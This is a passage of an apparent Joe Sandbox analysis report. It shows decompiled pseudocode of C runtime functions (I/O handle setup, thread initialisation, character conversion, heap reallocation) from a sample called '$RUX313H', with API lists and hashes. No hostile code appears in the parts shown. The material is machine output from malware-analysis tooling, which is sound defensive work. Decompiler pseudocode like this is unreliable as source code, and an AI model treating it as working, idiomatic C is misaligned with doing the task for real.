						while(1) {
							L27:
							 *(_t151 - 0x2c) = _t126;
							__eflags = _t126 - 3;
							if(_t126 >= 3) {
								break;
							}
							_t143 = (_t126 << 6) +  *0xe00798;
							 *(_t151 - 0x24) = _t143;
							__eflags =  *_t143 - 0xffffffff;
							if( *_t143 == 0xffffffff) {
								L31:
								_t143[1] = 0x81;
								__eflags = _t126;
								if(_t126 != 0) {
									_t65 = _t126 - 1; // -1
									asm("sbb eax, eax");
									_t88 =  ~_t65 + 0xfffffff5;
									__eflags = _t88;
								} else {
									_t88 = 0xfffffff6;
								}
								_t138 = GetStdHandle(_t88);
								__eflags = _t138 - 0xffffffff;
								if(_t138 == 0xffffffff) {
									L43:
									_t143[1] = _t143[1] | 0x00000040;
									 *_t143 = 0xfffffffe;
									_t92 =  *0xe00bbc; // 0x0
									__eflags = _t92;
									if(_t92 != 0) {
										 *( *((intOrPtr*)(_t92 + _t126 * 4)) + 0x10) = 0xfffffffe;
									}
									goto L45;
								} else {
									__eflags = _t138;
									if(_t138 == 0) {
										goto L43;
									}
									_t96 = GetFileType(_t138);
									__eflags = _t96;
									if(_t96 == 0) {
										goto L43;
									}
									 *_t143 = _t138;
									_t97 = _t96 & 0x000000ff;
									__eflags = _t97 - 2;
									if(_t97 != 2) {
										__eflags = _t97 - 3;
										if(_t97 != 3) {
											L42:
											_t69 =  &(_t143[3]); // -14681996
											InitializeCriticalSectionAndSpinCount(_t69, 0xfa0);
											_t143[2] = _t143[2] + 1;
											L45:
											_t126 = _t126 + 1;
											continue;
										}
										_t101 = _t143[1] | 0x00000008;
										__eflags = _t101;
										L41:
										_t143[1] = _t101;
										goto L42;
									}
									_t101 = _t143[1] | 0x00000040;
									goto L41;
								}
							}
							__eflags =  *_t143 - 0xfffffffe;
							if( *_t143 == 0xfffffffe) {
								goto L31;
							}
							_t143[1] = _t143[1] | 0x00000080;
							goto L45;
						}
						 *(_t151 - 4) = 0xfffffffe;
						E00DF2174();
						_t84 = 0;
						__eflags = 0;
						L47:
						return E00DF2A45(_t84);
					}
					_t103 =  *(_t151 - 0x40);
					__eflags = _t103;
					if(_t103 == 0) {
						goto L27;
					}
					_t131 =  *_t103;
					 *(_t151 - 0x1c) = _t131;
					_t104 = _t103 + 4;
					 *((intOrPtr*)(_t151 - 0x28)) = _t104;
					 *(_t151 - 0x20) = _t104 + _t131;
					__eflags = _t131 - 0x800;
					if(_t131 >= 0x800) {
						_t131 = 0x800;
						 *(_t151 - 0x1c) = 0x800;
					}
					_t145 = 1;
					__eflags = 1;
					 *(_t151 - 0x30) = 1;
					while(1) {
						__eflags =  *0xe01c74 - _t131; // 0x20
						if(__eflags >= 0) {
							break;
						}
						_t134 = E00DF2E3E(_t137, 0x40);
						 *(_t151 - 0x24) = _t134;
						__eflags = _t134;
						if(_t134 != 0) {
							0xe00798[_t145] = _t134;
							 *0xe01c74 =  *0xe01c74 + _t137;
							__eflags =  *0xe01c74;
							while(1) {
								__eflags = _t134 - 0xe00798[_t145] + 0x800;
								if(_t134 >= 0xe00798[_t145] + 0x800) {
									break;
								}
								 *((short*)(_t134 + 4)) = 0xa00;
								 *_t134 =  *_t134 | 0xffffffff;
								 *(_t134 + 8) = _t126;
								 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
								 *((short*)(_t134 + 0x25)) = 0xa0a;
								 *(_t134 + 0x38) = _t126;
								 *(_t134 + 0x34) = _t126;
								_t134 = _t134 + 0x40;
								 *(_t151 - 0x24) = _t134;
							}
							_t145 = _t145 + 1;
							 *(_t151 - 0x30) = _t145;
							_t131 =  *(_t151 - 0x1c);
							continue;
						}
						_t131 =  *0xe01c74; // 0x20
						 *(_t151 - 0x1c) = _t131;
						break;
					}
					_t139 = _t126;
					 *(_t151 - 0x2c) = _t139;
					_t107 =  *((intOrPtr*)(_t151 - 0x28));
					_t135 =  *(_t151 - 0x20);
					while(1) {
						__eflags = _t139 - _t131;
						if(_t139 >= _t131) {
							goto L27;
						}
						_t146 =  *_t135;
						__eflags = _t146 - 0xffffffff;
						if(_t146 == 0xffffffff) {
							L22:
							_t139 = _t139 + 1;
							 *(_t151 - 0x2c) = _t139;
							_t107 =  *((intOrPtr*)(_t151 - 0x28)) + 1;
							 *((intOrPtr*)(_t151 - 0x28)) = _t107;
							_t135 =  &(_t135[1]);
							 *(_t151 - 0x20) = _t135;
							continue;
						}
						__eflags = _t146 - 0xfffffffe;
						if(_t146 == 0xfffffffe) {
							goto L22;
						}
						_t109 =  *_t107;
						__eflags = _t109 & 0x00000001;
						if((_t109 & 0x00000001) == 0) {
							goto L22;
						}
						__eflags = _t109 & 0x00000008;
						if((_t109 & 0x00000008) != 0) {
							L20:
							_t150 = ((_t139 & 0x0000001f) << 6) + 0xe00798[_t139 >> 5];
							 *(_t151 - 0x24) = _t150;
							 *_t150 =  *_t135;
							 *((char*)(_t150 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t151 - 0x28))));
							_t37 = _t150 + 0xc; // 0xd
							InitializeCriticalSectionAndSpinCount(_t37, 0xfa0);
							_t38 = _t150 + 8;
							 *_t38 =  *(_t150 + 8) + 1;
							__eflags =  *_t38;
							_t135 =  *(_t151 - 0x20);
							L21:
							_t131 =  *(_t151 - 0x1c);
							goto L22;
						}
						_t117 = GetFileType(_t146);
						_t135 =  *(_t151 - 0x20);
						__eflags = _t117;
						if(_t117 == 0) {
							goto L21;
						}
						goto L20;
					}
					goto L27;
				}
				_t84 = E00DF4540(_t151, 0xdff000, _t151 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L47;
			}




























                                                                          0x00df1ecf
                                                                          0x00df1ed1
                                                                          0x00df1ed6
                                                                          0x00df1edd
                                                                          0x00df1ee3
                                                                          0x00df1ee5
                                                                          0x00df1ee8
                                                                          0x00df1eec
                                                                          0x00df1eed
                                                                          0x00df1eee
                                                                          0x00df1ef5
                                                                          0x00df1ef7
                                                                          0x00df1efc
                                                                          0x00df1f19
                                                                          0x00df1f1e
                                                                          0x00df1f24
                                                                          0x00df1f29
                                                                          0x00df1f2b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df1f2d
                                                                          0x00df1f33
                                                                          0x00df1f36
                                                                          0x00df1f39
                                                                          0x00df1f42
                                                                          0x00df1f45
                                                                          0x00df1f4b
                                                                          0x00df1f4e
                                                                          0x00df1f51
                                                                          0x00df1f54
                                                                          0x00df1f57
                                                                          0x00df1f57
                                                                          0x00df1f62
                                                                          0x00df1f68
                                                                          0x00df1f6d
                                                                          0x00df209c
                                                                          0x00df209c
                                                                          0x00df209c
                                                                          0x00df209f
                                                                          0x00df20a2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df20ad
                                                                          0x00df20b3
                                                                          0x00df20b6
                                                                          0x00df20b9
                                                                          0x00df20ce
                                                                          0x00df20ce
                                                                          0x00df20d2
                                                                          0x00df20d4
                                                                          0x00df20db
                                                                          0x00df20e0
                                                                          0x00df20e2
                                                                          0x00df20e2
                                                                          0x00df20d6
                                                                          0x00df20d8
                                                                          0x00df20d8
                                                                          0x00df20ec
                                                                          0x00df20ee
                                                                          0x00df20f1
                                                                          0x00df2138
                                                                          0x00df213e
                                                                          0x00df2141
                                                                          0x00df2147
                                                                          0x00df214c
                                                                          0x00df214e
                                                                          0x00df2153
                                                                          0x00df2153
                                                                          0x00000000
                                                                          0x00df20f3
                                                                          0x00df20f3
                                                                          0x00df20f5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df20f8
                                                                          0x00df20fe
                                                                          0x00df2100
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df2102
                                                                          0x00df2104
                                                                          0x00df2109
                                                                          0x00df210c
                                                                          0x00df2116
                                                                          0x00df2119
                                                                          0x00df2124
                                                                          0x00df2129
                                                                          0x00df212d
                                                                          0x00df2133
                                                                          0x00df215a
                                                                          0x00df215a
                                                                          0x00000000
                                                                          0x00df215a
                                                                          0x00df211f
                                                                          0x00df211f
                                                                          0x00df2121
                                                                          0x00df2121
                                                                          0x00000000
                                                                          0x00df2121
                                                                          0x00df2112
                                                                          0x00000000
                                                                          0x00df2112
                                                                          0x00df20f1
                                                                          0x00df20bb
                                                                          0x00df20be
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df20c6
                                                                          0x00000000
                                                                          0x00df20c6
                                                                          0x00df2160
                                                                          0x00df2167
                                                                          0x00df216c
                                                                          0x00df216c
                                                                          0x00df216e
                                                                          0x00df2173
                                                                          0x00df2173
                                                                          0x00df1f73
                                                                          0x00df1f76
                                                                          0x00df1f78
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df1f7e
                                                                          0x00df1f80
                                                                          0x00df1f83
                                                                          0x00df1f86
                                                                          0x00df1f8b
                                                                          0x00df1f93
                                                                          0x00df1f95
                                                                          0x00df1f97
                                                                          0x00df1f99
                                                                          0x00df1f99
                                                                          0x00df1f9e
                                                                          0x00df1f9e
                                                                          0x00df1f9f
                                                                          0x00df1fa2
                                                                          0x00df1fa2
                                                                          0x00df1fa8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df1fb4
                                                                          0x00df1fb6
                                                                          0x00df1fb9
                                                                          0x00df1fbb
                                                                          0x00df204f
                                                                          0x00df2056
                                                                          0x00df2056
                                                                          0x00df205c
                                                                          0x00df2068
                                                                          0x00df206a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df206c
                                                                          0x00df2072
                                                                          0x00df2075
                                                                          0x00df2078
                                                                          0x00df207c
                                                                          0x00df2082
                                                                          0x00df2085
                                                                          0x00df2088
                                                                          0x00df208b
                                                                          0x00df208b
                                                                          0x00df2090
                                                                          0x00df2091
                                                                          0x00df2094
                                                                          0x00000000
                                                                          0x00df2094
                                                                          0x00df1fc1
                                                                          0x00df1fc7
                                                                          0x00000000
                                                                          0x00df1fc7
                                                                          0x00df1fca
                                                                          0x00df1fcc
                                                                          0x00df1fcf
                                                                          0x00df1fd2
                                                                          0x00df1fd5
                                                                          0x00df1fd5
                                                                          0x00df1fd7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df1fdd
                                                                          0x00df1fdf
                                                                          0x00df1fe2
                                                                          0x00df203c
                                                                          0x00df203c
                                                                          0x00df203d
                                                                          0x00df2043
                                                                          0x00df2044
                                                                          0x00df2047
                                                                          0x00df204a
                                                                          0x00000000
                                                                          0x00df204a
                                                                          0x00df1fe4
                                                                          0x00df1fe7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df1fe9
                                                                          0x00df1feb
                                                                          0x00df1fed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df1fef
                                                                          0x00df1ff1
                                                                          0x00df2001
                                                                          0x00df200e
                                                                          0x00df2015
                                                                          0x00df201a
                                                                          0x00df2021
                                                                          0x00df2029
                                                                          0x00df202d
                                                                          0x00df2033
                                                                          0x00df2033
                                                                          0x00df2033
                                                                          0x00df2036
                                                                          0x00df2039
                                                                          0x00df2039
                                                                          0x00000000
                                                                          0x00df2039
                                                                          0x00df1ff4
                                                                          0x00df1ffa
                                                                          0x00df1ffd
                                                                          0x00df1fff
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df1fff
                                                                          0x00000000
                                                                          0x00df1fd5
                                                                          0x00df1f11
                                                                          0x00000000

                                                                          APIs
                                                                          • __lock.LIBCMT ref: 00DF1EDD
                                                                            • Part of subcall function 00DF2C8D: __mtinitlocknum.LIBCMT ref: 00DF2C9F
                                                                            • Part of subcall function 00DF2C8D: EnterCriticalSection.KERNEL32(00000000,?,00DF18B3,0000000D), ref: 00DF2CB8
                                                                          • __calloc_crt.LIBCMT ref: 00DF1EEE
                                                                            • Part of subcall function 00DF2E3E: __calloc_impl.LIBCMT ref: 00DF2E4D
                                                                            • Part of subcall function 00DF2E3E: Sleep.KERNEL32(00000000), ref: 00DF2E64
                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00DF1F09
                                                                          • GetStartupInfoW.KERNEL32(?,00DFD770,00000064,00DF12E9,00DFD6E0,00000014), ref: 00DF1F62
                                                                          • __calloc_crt.LIBCMT ref: 00DF1FAD
                                                                          • GetFileType.KERNEL32(00000001), ref: 00DF1FF4
                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00DF202D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                          • String ID:
                                                                          • API String ID: 1426640281-0
                                                                          • Opcode ID: 4f2398be6275b9c1705eeeff8138d6e696e8125b8bbb769769ea7e5089076b71
                                                                          • Instruction ID: 6a32de12a601b3f116e6257f0b98f217f4cb0c4f836f25158ad55826dd5f58ff
                                                                          • Opcode Fuzzy Hash: 4f2398be6275b9c1705eeeff8138d6e696e8125b8bbb769769ea7e5089076b71
                                                                          • Instruction Fuzzy Hash: C78190719053498FDB24CF68C8406B9BBF0AF09324B29825DD6A6AB3D1CB35D842CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00DF191D, Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 91%
                                                                          			E00DF191D(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E00DF1AD7(_t3);
				if(E00DF2DBC() != 0) {
					_t6 = E00DF263D(E00DF16AC);
					 *0xdff008 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00DF2E3E(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00DF1993();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00DF2699( *0xdff008, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00DF186A(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00DF1993();
					return 0;
				}
			}








                                                                          0x00df191d
                                                                          0x00df1929
                                                                          0x00df1938
                                                                          0x00df193e
                                                                          0x00df1943
                                                                          0x00df1946
                                                                          0x00000000
                                                                          0x00df1948
                                                                          0x00df1955
                                                                          0x00df1959
                                                                          0x00df195b
                                                                          0x00df198a
                                                                          0x00df198a
                                                                          0x00df198f
                                                                          0x00df1992
                                                                          0x00df195d
                                                                          0x00df196b
                                                                          0x00df196d
                                                                          0x00000000
                                                                          0x00df196f
                                                                          0x00df196f
                                                                          0x00df1971
                                                                          0x00df1972
                                                                          0x00df1979
                                                                          0x00df197f
                                                                          0x00df1983
                                                                          0x00df1987
                                                                          0x00df1989
                                                                          0x00df1989
                                                                          0x00df196d
                                                                          0x00df195b
                                                                          0x00df192b
                                                                          0x00df192b
                                                                          0x00df192b
                                                                          0x00df1932
                                                                          0x00df1932

                                                                          APIs
                                                                          • __init_pointers.LIBCMT ref: 00DF191D
                                                                            • Part of subcall function 00DF1AD7: RtlEncodePointer.NTDLL(00000000,?,00DF1922,00DF12CF,00DFD6E0,00000014), ref: 00DF1ADA
                                                                            • Part of subcall function 00DF1AD7: __initp_misc_winsig.LIBCMT ref: 00DF1AFB
                                                                            • Part of subcall function 00DF1AD7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00DF2721
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00DF2735
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00DF2748
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00DF275B
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00DF276E
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00DF2781
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00DF2794
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00DF27A7
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00DF27BA
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00DF27CD
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00DF27E0
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00DF27F3
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00DF2806
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00DF2819
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00DF282C
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00DF283F
                                                                          • __mtinitlocks.LIBCMT ref: 00DF1922
                                                                            • Part of subcall function 00DF2DBC: InitializeCriticalSectionAndSpinCount.KERNEL32(00DFF060,00000FA0,?,?,00DF1927,00DF12CF,00DFD6E0,00000014), ref: 00DF2DDA
                                                                          • __mtterm.LIBCMT ref: 00DF192B
                                                                            • Part of subcall function 00DF1993: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00DF1930,00DF12CF,00DFD6E0,00000014), ref: 00DF2CD8
                                                                            • Part of subcall function 00DF1993: _free.LIBCMT ref: 00DF2CDF
                                                                            • Part of subcall function 00DF1993: DeleteCriticalSection.KERNEL32(00DFF060,?,?,00DF1930,00DF12CF,00DFD6E0,00000014), ref: 00DF2D01
                                                                          • __calloc_crt.LIBCMT ref: 00DF1950
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00DF1979
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalSection$Delete$CountCurrentEncodeHandleInitializeModulePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                          • String ID:
                                                                          • API String ID: 2930087205-0
                                                                          • Opcode ID: 7fad517a97517468fa20d964c8528ff776e144c71fe47aaa831e576d8cae33ab
                                                                          • Instruction ID: 6d63908449a01298808b7aeba1434c350e9d6136c7c251cc745fed5945ae554a
                                                                          • Opcode Fuzzy Hash: 7fad517a97517468fa20d964c8528ff776e144c71fe47aaa831e576d8cae33ab
                                                                          • Instruction Fuzzy Hash: E4F0F03A11A3199DE3243B747C22B7A27C0DF01770B2BC62AF769D41D2EE50888148F4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00DF6F42, Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00DF6F42(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00DF3287( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00DF6E8A( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00DF3BBE(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                                                                          0x00df6f4a
                                                                          0x00df6f4f
                                                                          0x00df6f69
                                                                          0x00000000
                                                                          0x00df6f69
                                                                          0x00df6f51
                                                                          0x00df6f56
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df6f5b
                                                                          0x00df6f76
                                                                          0x00df6f7b
                                                                          0x00df6f7e
                                                                          0x00df6f85
                                                                          0x00df6fa4
                                                                          0x00df6fab
                                                                          0x00df6fad
                                                                          0x00df6ff1
                                                                          0x00df6ff9
                                                                          0x00df700e
                                                                          0x00df7010
                                                                          0x00df7020
                                                                          0x00df7020
                                                                          0x00df7024
                                                                          0x00df7026
                                                                          0x00df7029
                                                                          0x00df7029
                                                                          0x00df7029
                                                                          0x00df7029
                                                                          0x00000000
                                                                          0x00df702f
                                                                          0x00df7012
                                                                          0x00df7012
                                                                          0x00df7017
                                                                          0x00df7017
                                                                          0x00df701a
                                                                          0x00000000
                                                                          0x00df701a
                                                                          0x00df6faf
                                                                          0x00df6fb2
                                                                          0x00df6fb6
                                                                          0x00df6fdf
                                                                          0x00df6fdf
                                                                          0x00df6fe2
                                                                          0x00df6fe2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df6fe4
                                                                          0x00df6fe8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df6fea
                                                                          0x00df6fea
                                                                          0x00000000
                                                                          0x00df6fea
                                                                          0x00df6fb8
                                                                          0x00df6fbb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df6fbf
                                                                          0x00df6fd2
                                                                          0x00df6fd8
                                                                          0x00df6fdb
                                                                          0x00df6fdd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df6fdd
                                                                          0x00df6f87
                                                                          0x00df6f8a
                                                                          0x00df6f8c
                                                                          0x00df6f91
                                                                          0x00df6f91
                                                                          0x00df6f96
                                                                          0x00000000
                                                                          0x00df6f96
                                                                          0x00df6f5d
                                                                          0x00df6f62
                                                                          0x00df6f66
                                                                          0x00df6f66
                                                                          0x00000000

                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DF6F76
                                                                          • __isleadbyte_l.LIBCMT ref: 00DF6FA4
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 00DF6FD2
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 00DF7008
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          • Opcode ID: 03012b293263de87553c2e4ecabdc45298ee65cfb66bf6d954491c40607b2445
                                                                          • Instruction ID: 892f70d334eba4815cc2bfd63a52f91fa8f797c4e394bf837fa56dab073cfec5
                                                                          • Opcode Fuzzy Hash: 03012b293263de87553c2e4ecabdc45298ee65cfb66bf6d954491c40607b2445
                                                                          • Instruction Fuzzy Hash: 5831903160425AAFDB218F75D845BBA7BB5FF41310F1AC429FA5087591EB31E850DB70
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00DF4998, Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E00DF4998(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0xe00790, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0xe00b68 - _t7;
								if(__eflags == 0) {
									_t9 = E00DF3BBE(__eflags);
									 *_t9 = E00DF3BD1(GetLastError());
									goto L17;
								} else {
									__eflags = E00DF3EBA(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E00DF3BBE(__eflags);
										 *_t12 = E00DF3BD1(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00DF3EBA(_t6, _t31);
						 *((intOrPtr*)(E00DF3BBE(__eflags))) = 0xc;
						goto L12;
					} else {
						E00DF2E06(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00DF4906(__ebx, __edx, __edi, _a8);
				}
			}









                                                                          0x00df499f
                                                                          0x00df49ad
                                                                          0x00df49b0
                                                                          0x00df49b2
                                                                          0x00df49c1
                                                                          0x00df49f4
                                                                          0x00df49f4
                                                                          0x00df49f7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df49c4
                                                                          0x00df49c6
                                                                          0x00df49c8
                                                                          0x00df49c8
                                                                          0x00df49c8
                                                                          0x00df49d5
                                                                          0x00df49db
                                                                          0x00df49dd
                                                                          0x00df49df
                                                                          0x00df4a3f
                                                                          0x00df4a3f
                                                                          0x00df49e1
                                                                          0x00df49e1
                                                                          0x00df49e7
                                                                          0x00df4a29
                                                                          0x00df4a3d
                                                                          0x00000000
                                                                          0x00df49e9
                                                                          0x00df49f0
                                                                          0x00df49f2
                                                                          0x00df4a11
                                                                          0x00df4a25
                                                                          0x00df4a0b
                                                                          0x00df4a0b
                                                                          0x00df4a0b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
